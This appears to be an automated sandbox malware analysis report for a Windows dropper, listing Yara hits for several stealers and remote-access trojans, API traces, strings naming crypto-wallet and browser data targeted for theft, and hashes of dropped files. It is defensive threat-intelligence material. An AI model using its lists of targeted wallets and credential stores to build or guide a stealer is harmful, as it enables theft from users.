Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_005F0030 GetLocalTime,__swprintf,

19_2_005F0030

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_005F0722 GetUserNameW,

19_2_005F0722

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

19_2_005E416A

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe

Code function: 0_2_0040681B GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_0040681B

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 31.2.build2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.3.build2.exe.2b60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.build2.exe.2af0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.build2.exe.2af0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.3.build2.exe.2b60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001F.00000003.3728665099.0000000002B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.4175235264.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.4162638293.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000221001\exbuild.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\exbuild[1].exe, type: DROPPED

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: 3546345.exe PID: 7096, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match

File source: 00000027.00000002.3650886377.00000220BC200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 51.2.RegAsm.exe.482060.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.RegAsm.exe.482060.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000033.00000002.3597562499.0000000000479000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\D0nMCdvUeB.exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match	File source: 43.2.GOLD.exe.3405570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.2.GOLD.exe.3405570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.RegAsm.exe.436060.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.RegAsm.exe.436060.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 46.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000033.00000002.3597562499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.3591044518.0000000003405000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000002.4554653259.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: GOLD.exe PID: 8036, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3472, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 4204, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4500, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\WIDeqOfZq9.exe, type: DROPPED

Yara detected XWorm

Source: Yara match	File source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.0.IIZS2TRqf69aZbLAX3cf3edn.exe.bf0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002A.00000002.4703878971.0000000012DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000000.3476472138.0000000000BF2000.00000002.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.4674057559.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: IIZS2TRqf69aZbLAX3cf3edn.exe PID: 5052, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\Windows.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 51.2.RegAsm.exe.482060.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.RegAsm.exe.482060.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Roaming\D0nMCdvUeB.exe, type: DROPPED

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 3546345.exe, 00000025.00000000.3386144333.00000000005AD000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: FAmazon Musicworkspace-storagelocalization-cacheJavaScriptdictionarieswebviewMcAfeeScreenPalF:G:brave.exempressCodeSteamCachedDatalinknowTechSmithMcAfee_IncReleasesWindows Server 2008 %wS.nuget.dotnetMetroJaxxOneNoteElectrumEdrawWarThunderOpera Software\Opera DeveloperBorisFXAppCenterInnovative SolutionsDewMobilemoedaData (Time): ...atomic\Local Storage\leveldbmonedaDawnCacheCode CachedatabasesCrashpadVisualStudioVaultSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000DriverDescHARDWARE\DESCRIPTION\System\CentralProcessor\0ProcessorNameStringDisplayNameSOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\UninstallDisplayVersionSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallfhilaheimglignddkjgofkcbgekhenbhfnjhmkhhmkbjkkabndcnnogagogbneec
Source: 3546345.exe, 00000025.00000000.3386144333.00000000005AD000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: YXFeedsSquirrelTempPublishersinkscapeLedger Live\114\Exodus\backupExodus backup\MultiBitHDMultiBit HD\Electrum\wallets\ElectronCash\walletsElectron Cash\Electrum-btcp\walletsElectrum BTCP\walletsUnknown Wallet (Folder - wallets)MultiBitHDTestertof_launcher\tbs_cache\NZXT CAM\CLR_v2.0_32EOS-Webcam-Utilitybit_flags & MZ_ZIP_LDH_BIT_FLAG_HAS_LOCATORcatsxp.exebitboxF12NitroPioneerXuanZhi9MaxonXuanZhiGPU: Riot Games\VisualStudio Servicesapp.json.updaterId.node-redOnDeviceHeadSuggestModelbefore_first_zip
Source: 3546345.exe, 00000025.00000000.3386144333.00000000005AD000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: YXFeedsSquirrelTempPublishersinkscapeLedger Live\114\Exodus\backupExodus backup\MultiBitHDMultiBit HD\Electrum\wallets\ElectronCash\walletsElectron Cash\Electrum-btcp\walletsElectrum BTCP\walletsUnknown Wallet (Folder - wallets)MultiBitHDTestertof_launcher\tbs_cache\NZXT CAM\CLR_v2.0_32EOS-Webcam-Utilitybit_flags & MZ_ZIP_LDH_BIT_FLAG_HAS_LOCATORcatsxp.exebitboxF12NitroPioneerXuanZhi9MaxonXuanZhiGPU: Riot Games\VisualStudio Servicesapp.json.updaterId.node-redOnDeviceHeadSuggestModelbefore_first_zip
Source: 3546345.exe, 00000025.00000000.3386144333.00000000005AD000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: Numpadcom.liberty.jaxxMovavijrelauncher-updaterMy projectGoogleUpdaterpreferencesPackageCache
Source: 3546345.exe, 00000025.00000000.3386144333.00000000005AD000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: YXFeedsSquirrelTempPublishersinkscapeLedger Live\114\Exodus\backupExodus backup\MultiBitHDMultiBit HD\Electrum\wallets\ElectronCash\walletsElectron Cash\Electrum-btcp\walletsElectrum BTCP\walletsUnknown Wallet (Folder - wallets)MultiBitHDTestertof_launcher\tbs_cache\NZXT CAM\CLR_v2.0_32EOS-Webcam-Utilitybit_flags & MZ_ZIP_LDH_BIT_FLAG_HAS_LOCATORcatsxp.exebitboxF12NitroPioneerXuanZhi9MaxonXuanZhiGPU: Riot Games\VisualStudio Servicesapp.json.updaterId.node-redOnDeviceHeadSuggestModelbefore_first_zip
Source: 3546345.exe, 00000025.00000000.3386144333.00000000005AD000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: Picasa2ZomboidBeamNG.drivediscordFACEITOS: 2SnapshotsFailed to get temp path\exodus.walletH:VirtualBox VMsBlenderGIMPBlender FoundationMendeley Reference ManageropcgpfmipidbgpenhmajoajpbobppdilDATAparkFoxit SoftwareJDownloaderMoises360TotalSecurityMEmu360safe
Source: 3546345.exe, 00000025.00000000.3386144333.00000000005AD000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: AWebView2Panasonictrxnot initializedinvalid entry nameentry not foundinvalid zip modeinvalid compression levelno zip 64 supportmemset errorcannot write data to entrycannot initialize tdefl compressorinvalid indexheader not foundcannot flush tdefl buffercannot write entry headercannot create entry headercannot write to central dircannot open fileinvalid entry typeextracting data using no memory allocationfile not foundno permissionout of memoryinvalid zip archive namemake dir errorsymlink errorclose archive errorcapacity size too smallfseek errorfread errorfwrite errorcannot initialize readercannot initialize writercannot initialize writer from readerstream endneed dictionaryfile errorstream errordata errorout of memorybuf errorversion errorparameter errorTempstoragesolConfigEthereum (UTC).next%d x %d/home/anal/bot/zip_include/zip.c(zip->entry.header_offset & (pzip->m_file_offset_alignment - 1)) == 0webcache2webcachetonphraseseedpipWind
Source: RegAsm.exe, 00000033.00000002.3597562499.0000000000479000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: set_UseMachineKeyStore

OS version to string mapping found (often used in BOTs)

Source: GuardTrack.scr	Binary or memory string: WIN_81
Source: GuardTrack.scr	Binary or memory string: WIN_XP
Source: GuardTrack.scr	Binary or memory string: WIN_XPe
Source: GuardTrack.scr	Binary or memory string: WIN_VISTA
Source: GuardTrack.scr	Binary or memory string: WIN_7
Source: GuardTrack.scr	Binary or memory string: WIN_8
Source: Scottish.0.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: 3546345.exe PID: 7096, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match

File source: 00000027.00000002.3650886377.00000220BC200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 51.2.RegAsm.exe.482060.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.RegAsm.exe.482060.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000033.00000002.3597562499.0000000000479000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\D0nMCdvUeB.exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match	File source: 43.2.GOLD.exe.3405570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.2.GOLD.exe.3405570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.RegAsm.exe.436060.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.RegAsm.exe.436060.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 46.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000033.00000002.3597562499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.3591044518.0000000003405000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000002.4554653259.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: GOLD.exe PID: 8036, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3472, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 4204, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4500, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\WIDeqOfZq9.exe, type: DROPPED

Yara detected XWorm

Source: Yara match	File source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.0.IIZS2TRqf69aZbLAX3cf3edn.exe.bf0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002A.00000002.4703878971.0000000012DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000000.3476472138.0000000000BF2000.00000002.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.4674057559.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: IIZS2TRqf69aZbLAX3cf3edn.exe PID: 5052, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\Windows.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 51.2.RegAsm.exe.482060.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.RegAsm.exe.482060.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Roaming\D0nMCdvUeB.exe, type: DROPPED

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_0062696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	19_2_0062696E
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_00626E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	19_2_00626E32
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_0043269B Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,	31_2_0043269B
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_004319A4 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	31_2_004319A4
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B22902 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,	31_2_02B22902
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B21C0B Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	31_2_02B21C0B

Windows Analysis Report
wfJfUGeGT3.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

ID:	1502163
Product:	CloudBasic
Start time:	10:46:04
Start date:	31.08.2024
Sample:	wfJfUGeGT3.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	046ebd7e0f619f33de609ea3f126b0d3
SHA1:	37a0b634955eb29f9bc7d3d434838cd729bb7e17
SHA256:	bf554462c091219488a1a53fff22213df8d9530fa6ff0f59033b0c9ee9173555
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\3HvoFOAmEaJswFCHOzyfyz5b.exe	ASCII text	0B7D0E3C4F447BCF36DCA919DFEF1607	17C3A0B1A4773EC4F168CDC24904B792FADC8F2E	4F8F4E089917FBCCFC43593222BF9B17E43EDD9CD4BEF59B9152D4F8239C798D
C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	ASCII text	0B7D0E3C4F447BCF36DCA919DFEF1607	17C3A0B1A4773EC4F168CDC24904B792FADC8F2E	4F8F4E089917FBCCFC43593222BF9B17E43EDD9CD4BEF59B9152D4F8239C798D
C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows	8083FED730E151BF47528621DB8E7FF8	4AB5E2EB5C6326FD68704CDC5A4F719D332F51A6	AB0CA1D93238D0EFC02A41A7B311EFE3FC07C042F22D0608D33EA5313A667E55
C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	DB5717FD494495EEA3C8F7D4AB29D6B0	39BA82340121D9B08E9CF3D4BA6DFCB12EB6C559	6B59309AB12F1859A94FB2CE1C98639B2A538E6E098FFAC127E45C29733BD993
C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	771B8E84BA4F0215298D9DADFE5A10BF	0F5E4C440CD2E7B7D97723424BA9C56339036151	3F074FB6A883663F2937FD9435FC90F8D31CEABE496627D40B3813DBCC472ED0
C:\ProgramData\SmLAztxc1o8yfogkJXrRjbDt.exe	ASCII text	0B7D0E3C4F447BCF36DCA919DFEF1607	17C3A0B1A4773EC4F168CDC24904B792FADC8F2E	4F8F4E089917FBCCFC43593222BF9B17E43EDD9CD4BEF59B9152D4F8239C798D
C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	DB5717FD494495EEA3C8F7D4AB29D6B0	39BA82340121D9B08E9CF3D4BA6DFCB12EB6C559	6B59309AB12F1859A94FB2CE1C98639B2A538E6E098FFAC127E45C29733BD993
C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows	8083FED730E151BF47528621DB8E7FF8	4AB5E2EB5C6326FD68704CDC5A4F719D332F51A6	AB0CA1D93238D0EFC02A41A7B311EFE3FC07C042F22D0608D33EA5313A667E55
C:\Users\Public\Desktop\Google Chrome.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Wed Oct 4 13:16:54 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide	39DE4D465FAF69FE74B81A9383AE84D5	42C6F26F955BED80484D9D524925A00886544E18	2846CF5DAF4E75FE7320A09459020CC71AB5CDD03A4FD280091C4DDEEA585E1E
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GOLD.exe.log	ASCII text, with CRLF line terminators	84CFDB4B995B1DBF543B26B86C863ADC	D2F47764908BF30036CF8248B9FF5541E2711FA2	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\crypteda.exe.log	ASCII text, with CRLF line terminators	84CFDB4B995B1DBF543B26B86C863ADC	D2F47764908BF30036CF8248B9FF5541E2711FA2	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\installutil.exe.log	ASCII text, with CRLF line terminators	88593431AEF401417595E7A00FE86E5F	1714B8F6F6DCAAB3F3853EDABA7687F16DD331F4	ED5E60336FB00579E0867B9615CBD0C560BB667FE3CEE0674F690766579F1032
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\BowExpert[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive	DB2A12EDC73769F2F2B6B01545AFE2C3	73DC44FB0753296F51B851299F468031CEB77B54	E6DB7D34B498982601B2C45AC5B2A1C1B9502E502514CCFFAE9862F2AA719F42
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\contorax[1].exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	771B8E84BA4F0215298D9DADFE5A10BF	0F5E4C440CD2E7B7D97723424BA9C56339036151	3F074FB6A883663F2937FD9435FC90F8D31CEABE496627D40B3813DBCC472ED0
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\crypteda[1].exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	8E74497AFF3B9D2DDB7E7F819DFC69BA	1D18154C206083EAD2D30995CE2847CBEB6CDBC1	D8E81D9E336EF37A37CAE212E72B6F4EF915DB4B0F2A8DF73EB584BD25F21E66
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\GOLD[1].exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	D6FCA3CD57293390CCF9D2BC83662DDA	94496D01AA91E981846299EEAC5631AB8B8C4A93	74E0BF30C9107FA716920C878521037DB3CA4EEDA5C14D745A2459EB14D1190E
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build2[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows	F9A4F6684D1BF48406A42921AEBC1596	C9186FF53DE4724EDE20C6485136B4B2072BB6A6	E0A051F93D4C1E81CC142181D14249E246BE4C169645D667267134B664E75042
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\channel2[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows	F4C78D18C5B5CB531C897F23CF3D3FED	5C0F3D158F3A4DE86AB0C811CDD945236AFD4740	4553D0B891772C5170F9E840AE21F514C50C92636462A1BC785E536857456321
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\3546345[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows	FD2DEFC436FC7960D6501A01C91D893E	5FAA092857C3C892EAB49E7C0E5AC12D50BCE506	BA13DA01C41FA50EC5E340061973BC912B1F41CD1F96A7CAE5D40AFC00FF7945
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Channel1[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows	F9E43AEFFF1576AA7ADFC1688D5A24BF	9ACBCA30ABA919B26F1439668EBDB1B6A38E46EA	B1FCE873959EE7296C5D7307FC3E4302BC013C8DDCE57EE77708A94E4416653A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\exbuild[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows	F5D7B79EE6B6DA6B50E536030BCC3B59	751B555A8EEDE96D55395290F60ADC43B28BA5E2	2F1AFF28961BA0CE85EA0E35B8936BC387F84F459A4A1D63D964CE79E34B8459
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\kitty[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows	0EC1F7CC17B6402CD2DF150E0E5E92CA	8405B9BF28ACCB6F1907FBE28D2536DA4FBA9FC9	4C5CA5701285337A96298EBF994F8BA013D290C63AFA65B5C2B05771FBBB9ED4
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\meta[1].exe	PE32+ executable (GUI) x86-64, for MS Windows	3AACE51D76B16A60E94636150BD1137E	F6F1E069DF72735CB940058DDFB7144166F8489B	B51004463E8CDFE74C593F1D3E883FF20D53AD6081DE7BF46BB3837B86975955
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows	566728AF17C4D70FE4649EE22A80F9DD	F998138CEC60416B9F9A655F39B28C577EE8A126	B23BFB6C78F2608D465E2EECDE76CEB1F6211A7996547D7D6B89C8CE768A71C7
C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	PE32 executable (GUI) Intel 80386, for MS Windows	0EC1F7CC17B6402CD2DF150E0E5E92CA	8405B9BF28ACCB6F1907FBE28D2536DA4FBA9FC9	4C5CA5701285337A96298EBF994F8BA013D290C63AFA65B5C2B05771FBBB9ED4
C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	PE32 executable (GUI) Intel 80386, for MS Windows	F9A4F6684D1BF48406A42921AEBC1596	C9186FF53DE4724EDE20C6485136B4B2072BB6A6	E0A051F93D4C1E81CC142181D14249E246BE4C169645D667267134B664E75042
C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	771B8E84BA4F0215298D9DADFE5A10BF	0F5E4C440CD2E7B7D97723424BA9C56339036151	3F074FB6A883663F2937FD9435FC90F8D31CEABE496627D40B3813DBCC472ED0
C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	PE32 executable (GUI) Intel 80386, for MS Windows	FD2DEFC436FC7960D6501A01C91D893E	5FAA092857C3C892EAB49E7C0E5AC12D50BCE506	BA13DA01C41FA50EC5E340061973BC912B1F41CD1F96A7CAE5D40AFC00FF7945
C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	PE32+ executable (GUI) x86-64, for MS Windows	3AACE51D76B16A60E94636150BD1137E	F6F1E069DF72735CB940058DDFB7144166F8489B	B51004463E8CDFE74C593F1D3E883FF20D53AD6081DE7BF46BB3837B86975955
C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	D6FCA3CD57293390CCF9D2BC83662DDA	94496D01AA91E981846299EEAC5631AB8B8C4A93	74E0BF30C9107FA716920C878521037DB3CA4EEDA5C14D745A2459EB14D1190E
C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	8E74497AFF3B9D2DDB7E7F819DFC69BA	1D18154C206083EAD2D30995CE2847CBEB6CDBC1	D8E81D9E336EF37A37CAE212E72B6F4EF915DB4B0F2A8DF73EB584BD25F21E66
C:\Users\user\AppData\Local\Temp\1000221001\exbuild.exe	PE32 executable (GUI) Intel 80386, for MS Windows	F5D7B79EE6B6DA6B50E536030BCC3B59	751B555A8EEDE96D55395290F60ADC43B28BA5E2	2F1AFF28961BA0CE85EA0E35B8936BC387F84F459A4A1D63D964CE79E34B8459
